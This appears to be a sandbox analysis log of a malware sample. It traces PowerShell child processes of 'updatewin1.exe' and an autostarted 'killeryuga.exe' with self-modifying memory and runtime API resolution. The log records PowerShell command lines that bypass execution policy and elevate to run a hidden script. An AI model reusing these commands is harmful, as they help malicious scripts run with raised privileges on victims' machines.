Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Process #13: powershell.exe
0 0
»
Information Value
ID #13
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:03, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xa4c
Parent PID 0xa0c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A50
0x A94
0x A98
0x A9C
0x AA0
0x AA4
Process #14: powershell.exe
0 0
»
Information Value
ID #14
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1""' -Verb RunAs}"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:15, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xb04
Parent PID 0xa0c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B10
0x B08
Process #16: killeryuga.exe
1373 15
»
Information Value
ID #16
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:56, Reason: Autostart
Unmonitor End Time: 00:03:19, Reason: Self Terminated
Monitor Duration 00:00:23
OS Process Information
»
Information Value
PID 0x780
Parent PID 0x6f8 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 784
0x 7CC
0x 4BC
0x 4F0
0x 4F4
0x 4A8
0x 4B0
0x 494
0x 498
0x 4B4
0x 4E8
0x 5B0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Marked Writable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00407C6C, 0x004035D8 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x00904260 0x00943193 Marked Executable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE, 0x0040D690, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042A000 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004135F0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040C4E0 False
...
Threads
Thread 0x784
601 7
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75361462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x7536cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x75360e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75361400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75364a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x753635b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x76f5cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76a80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x76ac4124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x76ac232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x76ac555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x76aa138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x76a97590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x76ac439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x75beeba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e43c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x75486c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x7549011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x754aed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77634100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x7548b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x75493e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:38:48 (UTC) True 1
Fn
System Get Time type = Ticks, time = 84412 True 1
Fn
System Get Time type = Performance Ctr, time = 12804540292 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
